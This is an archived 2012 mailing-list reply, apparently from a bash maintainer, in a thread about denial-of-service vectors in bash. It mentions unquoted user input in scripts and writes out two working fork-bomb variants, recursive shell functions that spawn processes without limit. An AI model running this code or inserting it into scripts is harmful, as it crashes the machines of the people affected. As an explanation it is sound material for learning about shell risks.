[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: I think I may have found a possible dos attack vector within bash.
From: |
Chet Ramey |
Subject: |
Re: I think I may have found a possible dos attack vector within bash. |
Date: |
Tue, 20 Mar 2012 15:55:18 -0400 |
User-agent: |
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20120216 Thunderbird/10.0.2 |
On 3/20/12 2:17 PM, Stephane Chazelas wrote:
> 2012-03-20 16:47:51 +0000, Eamonn Smyth:
>> Without sounding alarmist, I can break my machine using bash. I also have a
>> fix. I shall be officially releasing the c code this weekend at the
>> hackathon london.
> [...]
>
> A DOS vector often found is bash *scripts* is when a script
> takes user input in a variable and that variable is left
> unquoted upon expansion in list contexts.
The most common attack vector, based on the number of times it has been
rediscovered, is infinite recursion:
f()
{
f | f &
}
while :; do f ; done
or the even simpler
f()
{
f | f &
}
f
both variants of the classic `fork bomb'. The first will probably do your
machine in quicker.
Chet
--
``The lyf so short, the craft so long to lerne.'' - Chaucer
``Ars longa, vita brevis'' - Hippocrates
Chet Ramey, ITS, CWRU chet@case.edu http://cnswww.cns.cwru.edu/~chet/